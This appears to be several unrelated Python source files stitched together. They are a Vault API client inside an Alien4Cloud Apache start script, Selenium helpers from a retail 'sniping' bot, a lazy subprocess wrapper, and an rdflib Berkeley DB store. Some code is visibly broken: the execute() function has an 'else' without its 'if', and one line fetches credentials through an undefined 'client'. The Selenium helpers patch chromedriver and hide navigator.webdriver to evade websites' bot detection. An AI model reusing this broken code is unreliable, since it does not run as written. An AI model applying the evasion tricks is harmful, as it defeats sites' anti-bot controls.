'disallow_reauthentication': disallow_reauthentication,
'allow_instance_migration': allow_instance_migration
}
if bound_ami_id is not None:
params['bound_ami_id'] = bound_ami_id
if bound_account_id is not None:
params['bound_account_id'] = bound_account_id
if bound_iam_role_arn is not None:
params['bound_iam_role_arn'] = bound_iam_role_arn
if bound_iam_instance_profile_arn is not None:
params['bound_iam_instance_profile_arn'] = bound_iam_instance_profile_arn
if role_tag is not None:
params['role_tag'] = role_tag
if max_ttl is not None:
params['max_ttl'] = max_ttl
if policies is not None:
params['policies'] = policies
params.update(**kwargs)
return self._post('/v1/auth/aws-ec2/role/{0}'.format(role), json=params)
def get_ec2_role(self, role):
"""
GET /auth/aws-ec2/role/<role>
"""
return self._get('/v1/auth/aws-ec2/role/{0}'.format(role)).json()
def delete_ec2_role(self, role):
"""
DELETE /auth/aws-ec2/role/<role>
"""
return self._delete('/v1/auth/aws-ec2/role/{0}'.format(role))
def list_ec2_roles(self):
"""
GET /auth/aws-ec2/roles?list=true
"""
try:
return self._get('/v1/auth/aws-ec2/roles', params={'list': True}).json()
except InvalidPath:
return None
def create_ec2_role_tag(self, role, policies=None, max_ttl=None, instance_id=None,
disallow_reauthentication=False, allow_instance_migration=False):
"""
POST /auth/aws-ec2/role/<role>/tag
"""
params = {
'role': role,
'disallow_reauthentication': disallow_reauthentication,
'allow_instance_migration': allow_instance_migration
}
if max_ttl is not None:
params['max_ttl'] = max_ttl
if policies is not None:
params['policies'] = policies
if instance_id is not None:
params['instance_id'] = instance_id
return self._post('/v1/auth/aws-ec2/role/{0}/tag'.format(role), json=params).json()
def auth_ldap(self, username, password, mount_point='ldap', use_token=True, **kwargs):
"""
POST /auth/<mount point>/login/<username>
"""
params = {
'password': password,
}
params.update(kwargs)
return self.auth('/v1/auth/{0}/login/{1}'.format(mount_point, username), json=params, use_token=use_token)
def auth_github(self, token, mount_point='github', use_token=True):
"""
POST /auth/<mount point>/login
"""
params = {
'token': token,
}
return self.auth('/v1/auth/{0}/login'.format(mount_point), json=params, use_token=use_token)
def auth(self, url, use_token=True, **kwargs):
response = self._post(url, **kwargs).json()
if use_token:
self.token = response['auth']['client_token']
return response
def list_auth_backends(self):
"""
GET /sys/auth
"""
return self._get('/v1/sys/auth').json()
def enable_auth_backend(self, backend_type, description=None, mount_point=None):
"""
POST /sys/auth/<mount point>
"""
if not mount_point:
mount_point = backend_type
params = {
'type': backend_type,
'description': description,
}
self._post('/v1/sys/auth/{0}'.format(mount_point), json=params)
def disable_auth_backend(self, mount_point):
"""
DELETE /sys/auth/<mount point>
"""
self._delete('/v1/sys/auth/{0}'.format(mount_point))
def create_role(self, role_name, **kwargs):
"""
POST /auth/approle/role/<role name>
"""
self._post('/v1/auth/approle/role/{0}'.format(role_name), json=kwargs)
def list_roles(self):
"""
GET /auth/approle/role
"""
return self._get('/v1/auth/approle/role?list=true').json()
def get_role_id(self, role_name):
"""
GET /auth/approle/role/<role name>/role-id
"""
url = '/v1/auth/approle/role/{0}/role-id'.format(role_name)
return self._get(url).json()['data']['role_id']
def set_role_id(self, role_name, role_id):
"""
POST /auth/approle/role/<role name>/role-id
"""
url = '/v1/auth/approle/role/{0}/role-id'.format(role_name)
params = {
'role_id': role_id
}
self._post(url, json=params)
def get_role(self, role_name):
"""
GET /auth/approle/role/<role name>
"""
return self._get('/v1/auth/approle/role/{0}'.format(role_name)).json()
def create_role_secret_id(self, role_name, meta=None):
"""
POST /auth/approle/role/<role name>/secret-id
"""
url = '/v1/auth/approle/role/{0}/secret-id'.format(role_name)
params = {}
if meta is not None:
params['metadata'] = json.dumps(meta)
return self._post(url, json=params).json()
def get_role_secret_id(self, role_name, secret_id):
"""
POST /auth/approle/role/<role name>/secret-id/lookup
"""
url = '/v1/auth/approle/role/{0}/secret-id/lookup'.format(role_name)
params = {
'secret_id': secret_id
}
return self._post(url, json=params).json()
def list_role_secrets(self, role_name):
"""
GET /auth/approle/role/<role name>/secret-id?list=true
"""
url = '/v1/auth/approle/role/{0}/secret-id?list=true'.format(role_name)
return self._get(url).json()
def get_role_secret_id_accessor(self, role_name, secret_id_accessor):
"""
GET /auth/approle/role/<role name>/secret-id-accessor/<secret_id_accessor>
"""
url = '/v1/auth/approle/role/{0}/secret-id-accessor/{1}'.format(role_name, secret_id_accessor)
return self._get(url).json()
def delete_role_secret_id(self, role_name, secret_id):
"""
POST /auth/approle/role/<role name>/secret-id/destroy
"""
url = '/v1/auth/approle/role/{0}/secret-id/destroy'.format(role_name)
params = {
'secret_id': secret_id
}
self._post(url, json=params)
def delete_role_secret_id_accessor(self, role_name, secret_id_accessor):
"""
DELETE /auth/approle/role/<role name>/secret-id/<secret_id_accessor>
"""
url = '/v1/auth/approle/role/{0}/secret-id-accessor/{1}'.format(role_name, secret_id_accessor)
self._delete(url)
def create_role_custom_secret_id(self, role_name, secret_id, meta=None):
"""
POST /auth/approle/role/<role name>/custom-secret-id
"""
url = '/v1/auth/approle/role/{0}/custom-secret-id'.format(role_name)
params = {
'secret_id': secret_id
}
if meta is not None:
params['meta'] = meta
return self._post(url, json=params).json()
def auth_approle(self, role_id, secret_id=None, mount_point='approle', use_token=True):
"""
POST /auth/approle/login
"""
params = {
'role_id': role_id
}
if secret_id is not None:
params['secret_id'] = secret_id
return self.auth('/v1/auth/{0}/login'.format(mount_point), json=params, use_token=use_token)
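    # Illustrative AppRole bootstrap (a sketch; 'myapp' and the policy name
    # are examples, not values defined in this module):
    #
    #   client.create_role('myapp', policies='web')
    #   role_id = client.get_role_id('myapp')
    #   secret_id = client.create_role_secret_id('myapp')['data']['secret_id']
    #   client.auth_approle(role_id, secret_id)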
def close(self):
"""
Close the underlying Requests session
"""
self.session.close()
def _get(self, url, **kwargs):
return self.__request('get', url, **kwargs)
def _post(self, url, **kwargs):
return self.__request('post', url, **kwargs)
def _put(self, url, **kwargs):
return self.__request('put', url, **kwargs)
def _delete(self, url, **kwargs):
return self.__request('delete', url, **kwargs)
def __request(self, method, url, headers=None, **kwargs):
url = urljoin(self._url, url)
if not headers:
headers = {}
if self.token:
headers['X-Vault-Token'] = self.token
wrap_ttl = kwargs.pop('wrap_ttl', None)
if wrap_ttl:
headers['X-Vault-Wrap-TTL'] = str(wrap_ttl)
_kwargs = self._kwargs.copy()
_kwargs.update(kwargs)
response = self.session.request(method, url, headers=headers,
allow_redirects=False, **_kwargs)
# NOTE(ianunruh): workaround for https://github.com/ianunruh/hvac/issues/51
while response.is_redirect and self.allow_redirects:
url = urljoin(self._url, response.headers['Location'])
response = self.session.request(method, url, headers=headers,
allow_redirects=False, **_kwargs)
if response.status_code >= 400 and response.status_code < 600:
text = errors = None
if response.headers.get('Content-Type') == 'application/json':
errors = response.json().get('errors')
if errors is None:
text = response.text
self.__raise_error(response.status_code, text, errors=errors)
return response
def __raise_error(self, status_code, message=None, errors=None):
if status_code == 400:
raise InvalidRequest(message, errors=errors)
elif status_code == 401:
raise Unauthorized(message, errors=errors)
elif status_code == 403:
raise Forbidden(message, errors=errors)
elif status_code == 404:
raise InvalidPath(message, errors=errors)
elif status_code == 429:
raise RateLimitExceeded(message, errors=errors)
elif status_code == 500:
raise InternalServerError(message, errors=errors)
elif status_code == 501:
raise VaultNotInitialized(message, errors=errors)
elif status_code == 503:
raise VaultDown(message, errors=errors)
else:
raise UnexpectedError(message)
def connect_to_vault_by_token(url, token):
return HashiCorpVaultClient(url=url, token=token)
def connect_to_vault_by_ldap(url, user, password):
client = HashiCorpVaultClient(url=url)
client.auth_ldap(user, password)
return client
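# Illustrative sketch (assumed URL and token, not values from this script):
#
#   client = connect_to_vault_by_token('https://localhost', 's.EXAMPLETOKEN')
#   assert client.is_authenticated()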
credentials = json.loads(client.secrets.get('vault-credentials-testGenerateLamp'))
vault_client = connect_to_vault_by_ldap(url='https://localhost', user=credentials['user'], password=credentials['password'])
def get_secret(secret_path):
return vault_client.read(secret_path)
env_map = {}
env_map['NODE'] = ctx.node.id
env_map['INSTANCE'] = ctx.instance.id
env_map['INSTANCES'] = get_instance_list(ctx.node.id)
env_map['HOST'] = get_host_node_name(ctx.instance)
env_map['A4C_EXECUTION_HOST'] = get_attribute(ctx, 'ip_address')
env_map['A4C_EXECUTION_USER'] = get_attribute_user(ctx)
env_map['A4C_EXECUTION_KEY'] = get_attribute_key(ctx)
env_map['SELF_CAPABILITIES_data_endpoint_initiator'] = r'source'
env_map['SELF_CAPABILITIES_admin_endpoint_port'] = ''
env_map['SELF_document_root'] = r'/var/www'
env_map['SELF_CAPABILITIES_admin_endpoint_network_name'] = r'PRIVATE'
env_map['SELF_CAPABILITIES_data_endpoint_network_name'] = r'PRIVATE'
env_map['SELF_CAPABILITIES_admin_endpoint_initiator'] = r'source'
env_map['SELF_CAPABILITIES_host_mem_size'] = ''
env_map['SELF_CAPABILITIES_data_endpoint_port_name'] = ''
env_map['SELF_port'] = r'80'
env_map['SELF_CAPABILITIES_host_num_cpus'] = ''
env_map['SELF_CAPABILITIES_data_endpoint_port'] = ''
env_map['SELF_CAPABILITIES_host_disk_size'] = ''
env_map['SELF_CAPABILITIES_data_endpoint_secure'] = r'false'
env_map['SELF_CAPABILITIES_data_endpoint_protocol'] = r'tcp'
env_map['SELF_CAPABILITIES_data_endpoint_url_path'] = ''
env_map['SELF_CAPABILITIES_admin_endpoint_secure'] = r'true'
env_map['SELF_CAPABILITIES_admin_endpoint_url_path'] = ''
env_map['SELF_component_version'] = r'2.4'
env_map['SELF_CAPABILITIES_host_cpu_frequency'] = ''
env_map['SELF_CAPABILITIES_admin_endpoint_protocol'] = r'tcp'
env_map['SELF_CAPABILITIES_admin_endpoint_port_name'] = ''
if inputs.get('process', None) is not None and inputs['process'].get('env', None) is not None:
ctx.logger.info('Operation is executed with environment variable {0}'.format(inputs['process']['env']))
env_map.update(inputs['process']['env'])
def convert_env_value_to_string(envDict):
    # Iterate over a snapshot of the keys: the dict is mutated (pop + insert)
    # inside the loop, which is unsafe while iterating over the live view.
    for key in list(envDict.keys()):
        envDict[str(key)] = str(envDict.pop(key))
def parse_output(output):
# by convention, the last output is the result of the operation
last_output = None
outputs = {}
    pattern = re.compile(r'EXPECTED_OUTPUT_(\w+)=(.*)')
for line in output.splitlines():
match = pattern.match(line)
if match is None:
last_output = line
else:
output_name = match.group(1)
output_value = match.group(2)
outputs[output_name] = output_value
return {'last_output': last_output, 'outputs': outputs}
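# Example of the convention parse_output() implements: a wrapped script prints
# one 'EXPECTED_OUTPUT_<NAME>=<value>' line per declared output, e.g. the raw
# output
#
#   EXPECTED_OUTPUT_PORT=8080
#   started ok
#
# parses to {'last_output': 'started ok', 'outputs': {'PORT': '8080'}}.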
def execute(script_path, process, outputNames, command_prefix=None, cwd=None, raiseException=True):
    os.chmod(script_path, 0o755)
on_posix = 'posix' in sys.builtin_module_names
env = os.environ.copy()
process_env = process.get('env', {})
env.update(process_env)
if outputNames is not None:
env['EXPECTED_OUTPUTS'] = outputNames
if platform.system() == 'Windows':
wrapper_path = ctx.download_resource("scriptWrapper.bat")
else:
wrapper_path = ctx.download_resource("scriptWrapper.sh")
        os.chmod(wrapper_path, 0o755)
command = '{0} {1}'.format(wrapper_path, script_path)
else:
command = script_path
if command_prefix is not None:
command = "{0} {1}".format(command_prefix, command)
ctx.logger.info('Executing: {0} in env {1}'.format(command, env))
process = subprocess.Popen(command,
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
env=env,
cwd=cwd,
bufsize=1,
close_fds=on_posix)
return_code = None
stdout_consumer = OutputConsumer(process.stdout)
stderr_consumer = OutputConsumer(process.stderr)
while True:
return_code = process.poll()
if return_code is not None:
break
time.sleep(0.1)
stdout_consumer.join()
stderr_consumer.join()
parsed_output = parse_output(stdout_consumer.buffer.getvalue())
if outputNames is not None:
outputNameList = outputNames.split(';')
for outputName in outputNameList:
            ctx.logger.info('Output name: {0} value : {1}'.format(outputName, parsed_output['outputs'].get(outputName, None)))
if return_code != 0:
error_message = "Script {0} encountered error with return code {1} and standard output {2}, error output {3}".format(command, return_code,
stdout_consumer.buffer.getvalue(),
stderr_consumer.buffer.getvalue())
error_message = str(unicode(error_message, errors='ignore'))
ctx.logger.error(error_message)
if raiseException:
ctx.logger.debug("Script {0} will raise an exception".format(command))
raise NonRecoverableError(error_message)
else:
ok_message = "Script {0} executed normally with standard output {1} and error output {2}".format(command, stdout_consumer.buffer.getvalue(),
stderr_consumer.buffer.getvalue())
ok_message = str(unicode(ok_message, errors='ignore'))
ctx.logger.info(ok_message)
return parsed_output
def executePy(script_path, tosca_env_map):
    tosca_params = {'tosca': {'inputs': tosca_env_map, 'outputs': {}}}
    execfile(script_path, globals().copy(), tosca_params)
    return tosca_params['tosca']
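# Sketch of the contract executePy() assumes (hypothetical artifact script):
# the executed file reads tosca['inputs'] and fills tosca['outputs'], e.g.
#
#   tosca['outputs']['URL'] = 'http://%s/' % tosca['inputs']['HOST']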
class OutputConsumer(object):
def __init__(self, out):
self.out = out
self.buffer = StringIO()
self.consumer = threading.Thread(target=self.consume_output)
self.consumer.daemon = True
self.consumer.start()
def consume_output(self):
for line in iter(self.out.readline, b''):
self.buffer.write(line)
self.out.close()
def join(self):
self.consumer.join()
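# Usage sketch for OutputConsumer (illustrative command): drain a pipe on a
# daemon thread so the child cannot block on a full stdout buffer.
#
#   proc = subprocess.Popen(['echo', 'hi'], stdout=subprocess.PIPE)
#   consumer = OutputConsumer(proc.stdout)
#   proc.wait()
#   consumer.join()
#   result = consumer.buffer.getvalue()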
new_script_process = {'env': env_map}
operationOutputNames = None
convert_env_value_to_string(new_script_process['env'])
raiseExceptionOnFailure = True
parsed_output = execute(ctx.download_resource('_a4c_impl_artifact/Apache/tosca.interfaces.node.lifecycle.Standard/start/start_apache.sh'), new_script_process, operationOutputNames, raiseException=raiseExceptionOnFailure)
outputs = parsed_output['outputs'].items()
for k,v in outputs:
ctx.logger.info('Output name: {0} value: {1}'.format(k, v))
ctx.instance.runtime_properties['_a4c_OO:tosca.interfaces.node.lifecycle.Standard:start:{0}'.format(k)] = v
ctx.instance.runtime_properties['apache_url'] = r'http://' + get_attribute(ctx, 'public_ip_address') + r':' + r'80' + r'/'
ctx.instance.update()
|
selenium_utils.py
|
from chromedriver_py import binary_path as driver_path
from selenium.webdriver import DesiredCapabilities
from selenium.webdriver import Chrome, ChromeOptions # TODO: Combine these two dependencies. Leaving it for now since it touches too many sites atm.
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions as ec
from selenium.webdriver.support.wait import WebDriverWait
from utils import create_msg
import random, re, requests, string, threading, settings
# https://github.com/Hari-Nagarajan/nvidia-bot/blob/master/utils/selenium_utils.py
options = Options()
options.add_experimental_option(
"excludeSwitches", ["enable-automation", "enable-logging"],
)
options.add_experimental_option("useAutomationExtension", False)
class AnyEc:
"""Use with WebDriverWait to combine expected_conditions
in an OR.
"""
def __init__(self, *args):
self.ecs = args
def __call__(self, driver):
for fn in self.ecs:
try:
if fn(driver):
return True
            except Exception:
                pass
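# Illustrative use of AnyEc (hypothetical titles): succeed as soon as any one
# of several expected conditions holds.
#
#   WebDriverWait(driver, 30).until(
#       AnyEc(ec.title_is("Sign-In"), ec.title_is("Checkout")))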
def no_amazon_image():
prefs = {"profile.managed_default_content_settings.images": 2}
options.add_experimental_option("prefs", prefs)
def yes_amazon_image():
prefs = {"profile.managed_default_content_settings.images": 0}
options.add_experimental_option("prefs", prefs)
def wait_for_element(d, e_id, time=30):
"""
    Uses webdriver(d) to wait for the element with id(e_id) to be present
"""
return WebDriverWait(d, time).until(ec.presence_of_element_located((By.ID, e_id)))
def wait_for_element_by_xpath(d, e_path, time=30):
return WebDriverWait(d, time).until(
ec.presence_of_element_located((By.XPATH, e_path))
)
def wait_for_element_by_class(d, e_class, time=30):
"""
    Uses webdriver(d) to wait for the element with class(e_class) to be present
"""
return WebDriverWait(d, time).until(
ec.presence_of_element_located((By.CLASS_NAME, e_class))
)
def wait_for_title(d, title, path):
    """
    Uses webdriver(d) to navigate to get(path) until the page title equals title(title)
    """
    while d.title != title:
        d.get(path)
        # A bare WebDriverWait(d, 1000) only constructs a waiter; actually
        # wait for the title, retrying navigation if it never appears.
        try:
            WebDriverWait(d, 1000).until(ec.title_is(title))
        except Exception:
            pass
def wait_for_page(d, title, time=30):
"""
Uses webdriver(d) to wait for page title(title) to become visible
"""
WebDriverWait(d, time).until(ec.title_is(title))
def wait_for_either_title(d, title1, title2, time=30):
"""
Uses webdriver(d) to wait for page title(title1 or title2) to become visible
"""
try:
WebDriverWait(d, time).until(AnyEc(ec.title_is(title1), ec.title_is(title2)))
except Exception:
pass
def wait_for_any_title(d, titles, time=30):
"""
Uses webdriver(d) to wait for page title(any in the list of titles) to become visible
"""
WebDriverWait(d, time).until(AnyEc(*[ec.title_is(title) for title in titles]))
def button_click_using_xpath(d, xpath):
"""
Uses webdriver(d) to click a button using an XPath(xpath)
"""
button_menu = WebDriverWait(d, 10).until(
ec.element_to_be_clickable((By.XPATH, xpath))
)
action = ActionChains(d)
action.move_to_element(button_menu).pause(1).click().perform()
def field_send_keys(d, field, keys):
"""
    Uses webdriver(d) to find a field(field), clear it and send keys(keys)
"""
elem = d.find_element_by_name(field)
elem.clear()
elem.send_keys(keys)
def has_class(element, class_name):
classes = element.get_attribute("class")
return class_name in classes
def add_cookies_to_session_from_driver(driver, session):
cookies = driver.get_cookies()
    for cookie in cookies:
        session.cookies.set_cookie(
            requests.cookies.create_cookie(
                domain=cookie["domain"],
                name=cookie["name"],
                value=cookie["value"],
            )
        )
def enable_headless():
options.add_argument("--headless")
options.add_argument("--no-sandbox")
options.add_argument("--disable-dev-shm-usage")
return options
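# Sketch (assumed flow): the module-level `options` object is mutated by the
# helpers above and can then be handed straight to Chrome.
#
#   no_amazon_image()
#   driver = Chrome(executable_path=driver_path, options=enable_headless())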
# https://stackoverflow.com/questions/33225947/can-a-website-detect-when-you-are-using-selenium-with-chromedriver
def change_driver(status_signal, loc):
fin = open(loc, 'rb')
data = fin.read()
val = "$" + "".join(random.choices(string.ascii_lowercase, k=3)) + "_" + \
"".join(random.choices(string.ascii_letters + string.digits, k=22)) + "_"
result = re.search(b"[$][a-z]{3}_[a-zA-Z0-9]{22}_", data)
if result is not None:
try:
status_signal.emit(create_msg("Changing value in Chromedriver", "normal"))
data = data.replace(result.group(0), val.encode())
fin.close()
fin = open(loc, 'wb')
fin.truncate()
fin.write(data)
fin.close()
        except Exception:
            status_signal.emit(create_msg("Error modifying chromedriver", "error"))
else:
fin.close()
def open_browser(link, cookies):
threading.Thread(target=start_browser, args=(link, cookies)).start()
def start_browser(link, cookies):
caps = DesiredCapabilities().CHROME
caps["pageLoadStrategy"] = "eager"
chrome_options = ChromeOptions()
chrome_options.add_experimental_option("excludeSwitches", ["enable-automation"])
chrome_options.add_experimental_option("useAutomationExtension", False)
driver = Chrome(desired_capabilities=caps, executable_path=driver_path, options=chrome_options)
driver.execute_cdp_cmd(
"Page.addScriptToEvaluateOnNewDocument",
{
"source": """
Object.defineProperty(window, 'navigator', {
value: new Proxy(navigator, {
has: (target, key) => (key === 'webdriver' ? false : key in target),
get: (target, key) =>
key === 'webdriver'
? undefined
: typeof target[key] === 'function'
? target[key].bind(target)
: target[key]
})
})
"""
},
)
driver.get(link)
for cookie in cookies:
driver.add_cookie({
"name": cookie["name"],
"value": cookie["value"],
"domain": cookie["domain"]
})
driver.get(link)
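# Usage sketch (hypothetical link and cookie): hand a session off to a visible
# browser without blocking the calling thread.
#
#   open_browser("https://example.com/cart",
#                [{"name": "session", "value": "abc", "domain": ".example.com"}])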
|
lazy_process.py
|
import subprocess
import threading
import time
class LazyProcess(object):
""" Abstraction describing a command line launching a service - probably
as needed as functionality is accessed in Galaxy.
"""
def __init__(self, command_and_args):
self.command_and_args = command_and_args
self.thread_lock = threading.Lock()
self.allow_process_request = True
self.process = None
def start_process(self):
with self.thread_lock:
if self.allow_process_request:
self.allow_process_request = False
t = threading.Thread(target=self.__start)
t.daemon = True
t.start()
def __start(self):
with self.thread_lock:
self.process = subprocess.Popen(self.command_and_args, close_fds=True)
def shutdown(self):
with self.thread_lock:
self.allow_process_request = False
if self.running:
self.process.terminate()
time.sleep(.01)
if self.running:
self.process.kill()
@property
def running(self):
        # poll() returns None while the process is alive; `not poll()` would
        # also treat a clean exit (return code 0) as still running.
        return self.process is not None and self.process.poll() is None
class NoOpLazyProcess(object):
""" LazyProcess abstraction meant to describe potentially optional
services, in those cases where one is not configured or valid, this
class can be used in place of LazyProcess.
"""
def start_process(self):
return
def shutdown(self):
return
@property
def running(self):
return False
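# Illustrative usage (assumed command line): the service starts lazily on
# first use and is torn down explicitly.
#
#   proc = LazyProcess(["redis-server", "--port", "6380"])
#   proc.start_process()  # idempotent; only the first call spawns the thread
#   proc.shutdown()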
|
sleepycat.py
|
from rdflib.store import Store, VALID_STORE, NO_STORE
from rdflib.term import URIRef
from six import b
from six.moves.urllib.request import pathname2url
def bb(u):
return u.encode('utf-8')
try:
from bsddb import db
has_bsddb = True
except ImportError:
try:
from bsddb3 import db
has_bsddb = True
except ImportError:
has_bsddb = False
from os import mkdir
from os.path import exists, abspath
from threading import Thread
if has_bsddb:
# These are passed to bsddb when creating DBs
# passed to db.DBEnv.set_flags
ENVSETFLAGS = db.DB_CDB_ALLDB
# passed to db.DBEnv.open
ENVFLAGS = db.DB_INIT_MPOOL | db.DB_INIT_CDB | db.DB_THREAD
CACHESIZE = 1024 * 1024 * 50
# passed to db.DB.Open()
DBOPENFLAGS = db.DB_THREAD
import logging
logger = logging.getLogger(__name__)
__all__ = ['Sleepycat']
class Sleepycat(Store):
context_aware = True
formula_aware = True
transaction_aware = False
graph_aware = True
db_env = None
def __init__(self, configuration=None, identifier=None):
if not has_bsddb:
raise ImportError(
"Unable to import bsddb/bsddb3, store is unusable.")
self.__open = False
self.__identifier = identifier
super(Sleepycat, self).__init__(configuration)
self._loads = self.node_pickler.loads
self._dumps = self.node_pickler.dumps
def __get_identifier(self):
return self.__identifier
identifier = property(__get_identifier)
def _init_db_environment(self, homeDir, create=True):
if not exists(homeDir):
if create is True:
mkdir(homeDir)
# TODO: implement create method and refactor this to it
self.create(homeDir)
else:
return NO_STORE
db_env = db.DBEnv()
db_env.set_cachesize(0, CACHESIZE) # TODO
# db_env.set_lg_max(1024*1024)
db_env.set_flags(ENVSETFLAGS, 1)
db_env.open(homeDir, ENVFLAGS | db.DB_CREATE)
return db_env
def is_open(self):
return self.__open
def open(self, path, create=True):
if not has_bsddb:
return NO_STORE
homeDir = path
if self.__identifier is None:
self.__identifier = URIRef(pathname2url(abspath(homeDir)))
db_env = self._init_db_environment(homeDir, create)
if db_env == NO_STORE:
return NO_STORE
self.db_env = db_env
self.__open = True
dbname = None
dbtype = db.DB_BTREE
# auto-commit ensures that the open-call commits when transactions
# are enabled
dbopenflags = DBOPENFLAGS
if self.transaction_aware is True:
dbopenflags |= db.DB_AUTO_COMMIT
if create:
dbopenflags |= db.DB_CREATE
dbmode = 0o660
dbsetflags = 0
# create and open the DBs
self.__indicies = [None, ] * 3
self.__indicies_info = [None, ] * 3
for i in range(0, 3):
index_name = to_key_func(
i)((b("s"), b("p"), b("o")), b("c")).decode()
index = db.DB(db_env)
index.set_flags(dbsetflags)
index.open(index_name, dbname, dbtype, dbopenflags, dbmode)
self.__indicies[i] = index
self.__indicies_info[i] = (index, to_key_func(i), from_key_func(i))
lookup = {}
for i in range(0, 8):
results = []
for start in range(0, 3):
score = 1
len = 0
for j in range(start, start + 3):
if i & (1 << (j % 3)):
score = score << 1
len += 1
else:
break
tie_break = 2 - start
results.append(((score, tie_break), start, len))
results.sort()
score, start, len = results[-1]
def get_prefix_func(start, end):
def get_prefix(triple, context):
if context is None:
yield ""
else:
yield context
i = start
while i < end:
yield triple[i % 3]
i += 1
yield ""
return get_prefix
lookup[i] = (
self.__indicies[start],
get_prefix_func(start, start + len),
from_key_func(start),
results_from_key_func(start, self._from_string))
self.__lookup_dict = lookup
self.__contexts = db.DB(db_env)
self.__contexts.set_flags(dbsetflags)
self.__contexts.open("contexts", dbname, dbtype, dbopenflags, dbmode)
self.__namespace = db.DB(db_env)
self.__namespace.set_flags(dbsetflags)
self.__namespace.open("namespace", dbname, dbtype, dbopenflags, dbmode)
self.__prefix = db.DB(db_env)
self.__prefix.set_flags(dbsetflags)
self.__prefix.open("prefix", dbname, dbtype, dbopenflags, dbmode)
self.__k2i = db.DB(db_env)
self.__k2i.set_flags(dbsetflags)
self.__k2i.open("k2i", dbname, db.DB_HASH, dbopenflags, dbmode)
self.__i2k = db.DB(db_env)
self.__i2k.set_flags(dbsetflags)
self.__i2k.open("i2k", dbname, db.DB_RECNO, dbopenflags, dbmode)
self.__needs_sync = False
t = Thread(target=self.__sync_run)
        t.daemon = True
t.start()
self.__sync_thread = t
return VALID_STORE
def __sync_run(self):
from time import sleep, time
try:
min_seconds, max_seconds = 10, 300
while self.__open:
if self.__needs_sync:
t0 = t1 = time()
self.__needs_sync = False
while self.__open:
sleep(.1)
if self.__needs_sync:
t1 = time()
self.__needs_sync = False
if time() - t1 > min_seconds \
or time() - t0 > max_seconds:
self.__needs_sync = False
logger.debug("sync")
self.sync()
break
else:
sleep(1)
except Exception as e:
logger.exception(e)
def sync(self):
if self.__open:
for i in self.__indicies:
i.sync()
self.__contexts.sync()
self.__namespace.sync()
self.__prefix.sync()
self.__i2k.sync()
self.__k2i.sync()
def close(self, commit_pending_transaction=False):
self.__open = False
self.__sync_thread.join()
for i in self.__indicies:
i.close()
self.__contexts.close()
self.__namespace.close()
self.__prefix.close()
self.__i2k.close()
self.__k2i.close()
self.db_env.close()
def add(self, triple, context, quoted=False, txn=None):
"""\
Add a triple to the store of triples.
"""
(subject, predicate, object) = triple
assert self.__open, "The Store must be open."
assert context != self, "Can not add triple directly to store"
Store.add(self, (subject, predicate, object), context, quoted)
_to_string = self._to_string
s = _to_string(subject, txn=txn)
p = _to_string(predicate, txn=txn)
o = _to_string(object, txn=txn)
c = _to_string(context, txn=txn)
cspo, cpos, cosp = self.__indicies
value = cspo.get(bb("%s^%s^%s^%s^" % (c, s, p, o)), txn=txn)
if value is None:
self.__contexts.put(bb(c), "", txn=txn)
contexts_value = cspo.get(
bb("%s^%s^%s^%s^" % ("", s, p, o)), txn=txn) or b("")
contexts = set(contexts_value.split(b("^")))
contexts.add(bb(c))
contexts_value = b("^").join(contexts)
assert contexts_value is not None
cspo.put(bb("%s^%s^%s^%s^" % (c, s, p, o)), "", txn=txn)
cpos.put(bb("%s^%s^%s^%s^" % (c, p, o, s)), "", txn=txn)
cosp.put(bb("%s^%s^%s^%s^" % (c, o, s, p)), "", txn=txn)
if not quoted:
cspo.put(bb(
"%s^%s^%s^%s^" % ("", s, p, o)), contexts_value, txn=txn)
cpos.put(bb(
"%s^%s^%s^%s^" % ("", p, o, s)), contexts_value, txn=txn)
cosp.put(bb(
"%s^%s^%s^%s^" % ("", o, s, p)), contexts_value, txn=txn)
self.__needs_sync = True
def __remove(self, spo, c, quoted=False, txn=None):
s, p, o = spo
cspo, cpos, cosp = self.__indicies
contexts_value = cspo.get(
b("^").join([b(""), s, p, o, b("")]), txn=txn) or b("")
contexts = set(contexts_value.split(b("^")))
contexts.discard(c)
contexts_value = b("^").join(contexts)
for i, _to_key, _from_key in self.__indicies_info:
i.delete(_to_key((s, p, o), c), txn=txn)
if not quoted:
if contexts_value:
for i, _to_key, _from_key in self.__indicies_info:
i.put(_to_key((s, p, o), b("")), contexts_value, txn=txn)
else:
for i, _to_key, _from_key in self.__indicies_info:
try:
i.delete(_to_key((s, p, o), b("")), txn=txn)
except db.DBNotFoundError:
pass # TODO: is it okay to ignore these?
def remove(self, spo, context, txn=None):
subject, predicate, object = spo
assert self.__open, "The Store must be open."
Store.remove(self, (subject, predicate, object), context)
_to_string = self._to_string
if context is not None:
if context == self:
context = None
if subject is not None \
and predicate is not None \
and object is not None \
and context is not None:
s = _to_string(subject, txn=txn)
p = _to_string(predicate, txn=txn)
o = _to_string(object, txn=txn)
c = _to_string(context, txn=txn)
value = self.__indicies[0].get(bb("%s^%s^%s^%s^" %
(c, s, p, o)), txn=txn)
if value is not None:
self.__remove((bb(s), bb(p), bb(o)), bb(c), txn=txn)
self.__needs_sync = True
else:
cspo, cpos, cosp = self.__indicies
index, prefix, from_key, results_from_key = self.__lookup(
(subject, predicate, object), context, txn=txn)
cursor = index.cursor(txn=txn)
try:
current = cursor.set_range(prefix)
needs_sync = True
except db.DBNotFoundError:
current = None
needs_sync = False
cursor.close()
while current:
key, value = current
cursor = index.cursor(txn=txn)
try:
cursor.set_range(key)
# Hack to stop 2to3 converting this to next(cursor)
current = getattr(cursor, 'next')()
except db.DBNotFoundError:
current = None
cursor.close()
if key.startswith(prefix):
c, s, p, o = from_key(key)
if context is None:
contexts_value = index.get(key, txn=txn) or b("")
# remove triple from all non quoted contexts
contexts = set(contexts_value.split(b("^")))
# and from the conjunctive index
contexts.add(b(""))
for c in contexts:
for i, _to_key, _ in self.__indicies_info:
i.delete(_to_key((s, p, o), c), txn=txn)
else:
self.__remove((s, p, o), c, txn=txn)
else:
break
if context is not None:
if subject is None and predicate is None and object is None:
# TODO: also if context becomes empty and not just on
# remove((None, None, None), c)
try:
self.__contexts.delete(
bb(_to_string(context, txn=txn)), txn=txn)
except db.DBNotFoundError:
pass
self.__needs_sync = needs_sync
def triples(self, spo, context=None, txn=None):
"""A generator over all the triples matching """
assert self.__open, "The Store must be open."
subject, predicate, object = spo
if context is not None:
if context == self:
context = None
# _from_string = self._from_string ## UNUSED
index, prefix, from_key, results_from_key = self.__lookup(
(subject, predicate, object), context, txn=txn)
